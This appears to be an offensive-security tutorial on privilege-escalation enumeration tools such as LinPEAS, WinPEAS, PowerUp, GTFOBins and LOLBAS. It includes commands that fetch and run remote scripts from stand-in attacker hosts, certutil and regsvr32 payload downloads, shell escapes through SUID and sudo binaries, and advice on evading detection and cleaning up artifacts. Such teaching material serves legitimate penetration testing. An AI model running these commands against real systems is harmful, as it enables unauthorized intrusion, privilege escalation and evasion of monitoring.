# Automated Enumeration Tools Automated enumeration tools are essential for efficient privilege escalation reconnaissance. They systematically scan systems for misconfigurations, vulnerable services, and escalation vectors that might be missed during manual enumeration. ## LinPEAS (Linux Privilege Escalation Awesome Script) #### Overview LinPEAS is a comprehensive privilege escalation enumeration script for Linux systems. It performs extensive automated checks and highlights potential privilege escalation vectors with color-coded output. #### Key Features * **Comprehensive scanning** of system configurations, services, and file permissions * **Color-coded output** to prioritize findings (red = critical, yellow = interesting) * **Modular checks** covering kernel exploits, SUID/SGID files, cron jobs, and more * **Network enumeration** including listening services and network connections * **Container detection** for Docker and other containerized environments #### Download and Transfer Methods ```bash # Direct download (if target has internet access) curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh # Download to attacking machine first wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh # Transfer via HTTP server python3 -m http.server 8000 # On target: curl http://attacker-ip:8000/linpeas.sh | bash # Transfer via netcat nc -q 5 -lvnp 4444 < linpeas.sh # On target: cat < /dev/tcp/attacker-ip/4444 | sh ``` #### Basic Execution ```bash # Standard execution chmod +x linpeas.sh ./linpeas.sh # Save output to file ./linpeas.sh | tee linpeas_output.txt # Extended checks (recommended for CTFs) ./linpeas.sh -a | tee linpeas_full.txt ``` #### Key LinPEAS Checks **System Information**: Kernel version, OS details, installed software packages **File Permissions**: SUID/SGID binaries, world-writable files, interesting file permissions **Process Analysis**: Running processes, cron jobs, systemd timers **Network Information**: Open ports, network connections, listening services **User Information**: User accounts, group memberships, sudo permissions **Software Analysis**: Installed packages, vulnerable software versions #### Output Interpretation **Color Coding System**: * **Red**: Critical findings requiring immediate attention (99% privilege escalation vector) * **Yellow**: Important findings worth investigating * **Light Cyan**: Users with console access * **Blue**: Users without console access and mounted devices * **Green**: Common findings (users, groups, SUID/SGID files) * **Light Magenta**: Current user information ## WinPEAS (Windows Privilege Escalation Awesome Script) #### Overview WinPEAS is the Windows counterpart to LinPEAS, designed specifically for Windows environments to identify privilege escalation opportunities through automated system enumeration. #### Key Features **Service Enumeration**: Identifies vulnerable services, unquoted service paths, and service permissions **Registry Analysis**: Scans registry for misconfigurations and stored credentials **File System Analysis**: Checks for writable directories, interesting files, and cached credentials **User and Group Analysis**: Enumerates user accounts, group memberships, and privileges **Network Configuration**: Analyzes network settings, open ports, and connections **Scheduled Tasks**: Identifies potentially exploitable scheduled tasks and cron jobs #### Download and Transfer ```bash # Download latest WinPEAS executable wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe # Transfer via HTTP (on attacking machine) python3 -m http.server 8000 # On target Windows machine powershell.exe -c "IWR -Uri http://attacker-ip:8000/winPEASx64.exe -OutFile winPEAS.exe" # Alternative download method certutil -urlcache -split -f http://attacker-ip:8000/winPEASx64.exe winPEAS.exe ``` #### Basic Execution ```cmd # Standard execution .\winPEAS.exe # Save output to file .\winPEAS.exe > results.txt # Extended search (includes password hunting) .\winPEAS.exe searchall > full_results.txt # Quick execution for time-sensitive scenarios .\winPEAS.exe fast ``` #### WinPEAS Variants **winPEASx64.exe**: For 64-bit Windows systems (recommended) **winPEASx86.exe**: For 32-bit Windows systems **winPEAS.bat**: Batch script version for older systems without .NET Framework **winPEASany.exe**: Universal executable that works on any architecture ## LinEnum and PowerUp #### LinEnum Overview LinEnum is a scripted local Linux enumeration tool designed to identify privilege escalation opportunities through comprehensive system analysis. **Key Features** * Performs over 65 automated privilege escalation checks * Highlights potential vulnerabilities in yellow text for easy identification * Includes experimental reporting functionality for formatted output * Searches through configuration and log files for keywords * Analyzes kernel information, SUID/SGID files, and sudo misconfigurations **Basic Usage** ```bash # Download LinEnum wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh # Transfer and execute python3 -m http.server 8000 # On target: wget http://attacker-ip:8000/LinEnum.sh chmod +x LinEnum.sh ./LinEnum.sh # Save output to file ./LinEnum.sh > linenum_results.txt # Thorough scan (slower but more comprehensive) ./LinEnum.sh -t # Search for specific keywords in files ./LinEnum.sh -k password ``` **Key Sections of LinEnum Output** * **Kernel Information**: Identifies potential kernel exploits * **Environmental Variables**: Checks PATH and other environment settings * **Jobs/Tasks**: Analyzes cron jobs and scheduled tasks for privilege escalation * **Networking**: Lists open ports and network configuration * **Services**: Identifies running services and their configurations * **SUID Files**: Locates binaries with special permissions that can be exploited #### PowerUp Overview PowerUp is a PowerShell script designed for Windows privilege escalation that focuses on common misconfigurations and vulnerabilities. **Key Features** * **Service Analysis**: Identifies vulnerable services with weak permissions and unquoted service paths * **Registry Analysis**: Checks for registry misconfigurations that can be exploited * **File Permissions**: Analyzes file and folder permissions for potential write access * **AlwaysInstallElevated**: Checks for MSI installation privilege escalation * **UAC Bypass**: Identifies UAC bypass opportunities **Basic Usage** ```powershell # Download and execute PowerUp IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1') # Run all checks Invoke-AllChecks # Save output to file Invoke-AllChecks | Out-File -FilePath powerup_results.txt # Execute with bypass for execution policy powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1'); Invoke-AllChecks" ``` **Key PowerUp Functions** * **Get-UnquotedService**: Identifies services with unquoted paths * **Get-ServiceFilePermission**: Checks service binary permissions * **Get-ServicePermission**: Analyzes service configuration permissions * **Get-RegAlwaysInstallElevated**: Checks for AlwaysInstallElevated registry keys * **Invoke-ServiceAbuse**: Automatically exploits vulnerable services ## GTFOBins and LOLBAS #### GTFOBins Overview GTFOBins (GTFObins.github.io) is a curated list of Unix binaries that can be exploited to break out of restricted shells, escalate privileges, or bypass security controls. **Key Categories** * **SUID Exploitation**: Binaries with SUID bit set that can be abused for privilege escalation * **Sudo Abuse**: Programs allowed via sudo that can be exploited to gain root access * **Capabilities**: Binaries with Linux capabilities that can be leveraged * **Shell Escapes**: Methods to break out of restricted shells * **File Operations**: Reading/writing sensitive files through legitimate binaries **Common GTFOBins Examples** * **vim/nano**: Text editors that can spawn shells or read sensitive files * **find**: File search utility that can execute commands with elevated privileges * **wget/curl**: Network tools that can read files or download/upload data * **python/perl**: Interpreters that can execute arbitrary code * **nmap**: Network scanner with scripting capabilities for privilege escalation **Usage Examples** ```bash # Check for SUID binaries find / -type f -perm -04000 -ls 2>/dev/null # Example: Exploiting SUID find binary find /etc/passwd -exec /bin/sh \; # Example: Sudo vim exploitation sudo vim -c '!sh' # Example: Using capabilities /usr/bin/view -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' ``` #### LOLBAS Overview LOLBAS (Living Off The Land Binaries and Scripts) is the Windows equivalent of GTFOBins, documenting legitimate Windows binaries that can be abused for malicious purposes. **Key LOLBAS Categories** * **Command Execution**: Binaries that can execute arbitrary commands or scripts * **File Operations**: Tools for reading, writing, or transferring files * **Network Communications**: Utilities for network connections and data transfer * **UAC Bypass**: Methods to bypass User Account Control restrictions * **Privilege Escalation**: Techniques to elevate system privileges **Common LOLBAS Examples** * **certutil.exe**: Certificate utility that can download files and decode base64 data * **powershell.exe**: Command-line shell and scripting language with extensive capabilities * **regsvr32.exe**: DLL registration tool that can execute scripts and download content * **mshta.exe**: HTML application host that can execute JavaScript and VBScript * **rundll32.exe**: Windows utility that can load and execute DLL functions **Usage Examples** ```cmd # File download with certutil certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe # Execute script with regsvr32 regsvr32 /s /n /u /i:http://attacker.com/malicious.sct scrobj.dll # Base64 decode with certutil certutil -decode encoded_file.txt decoded_payload.exe # PowerShell download and execute powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')" ``` ## Operational Best Practices #### Tool Selection Strategy **For Comprehensive Enumeration:** 1. **Start with automated tools** (LinPEAS/WinPEAS) for broad coverage 2. **Cross-reference findings** with specialized tools (LinEnum/PowerUp) 3. **Validate opportunities** using GTFOBins/LOLBAS for exploitation paths 4. **Manual verification** of automated tool findings **Environment Considerations:** * **Network restrictions**: Choose tools that work offline or have minimal dependencies * **AV/EDR presence**: Consider detection signatures and behavioral analysis * **System resources**: Some tools are resource-intensive and may impact system performance * **Time constraints**: Balance thoroughness with operational timelines #### Integration Workflows **Standard Privilege Escalation Workflow:** 1. **Initial enumeration** with LinPEAS/WinPEAS 2. **Targeted analysis** with LinEnum/PowerUp for specific vectors 3. **Exploitation research** using GTFOBins/LOLBAS 4. **Manual verification** and testing of identified paths 5. **Documentation** of successful privilege escalation vectors **Red Team Operations:** * Use tools in sequence for comprehensive coverage * Maintain operational security by understanding tool footprints * Document findings for post-engagement reporting * Consider tool detection signatures in defensive environments ## Key Operational Considerations #### Success Indicators * Identification of vulnerable services and misconfigurations * Discovery of SUID/SGID binaries with exploitation potential * Sudo misconfigurations allowing privilege escalation * Writable directories and files in privileged locations * Cached credentials and sensitive information exposure #### Common Failure Points * Proper system hardening preventing common escalation vectors * Updated systems with patched vulnerabilities * Restricted execution environments limiting tool functionality * Network segmentation preventing tool download and execution * Advanced monitoring detecting enumeration activities #### Detection Evasion * **File transfer methods**: Use legitimate protocols and built-in tools when possible * **Execution timing**: Run tools during high-activity periods to blend with normal operations * **Output management**: Redirect output to temporary locations and clean up artifacts * **Tool selection**: Choose appropriate variants based on system architecture and constraints These automated enumeration tools form the backbone of modern privilege escalation assessments, providing systematic approaches to identifying security misconfigurations and exploitable conditions across both Linux and Windows environments.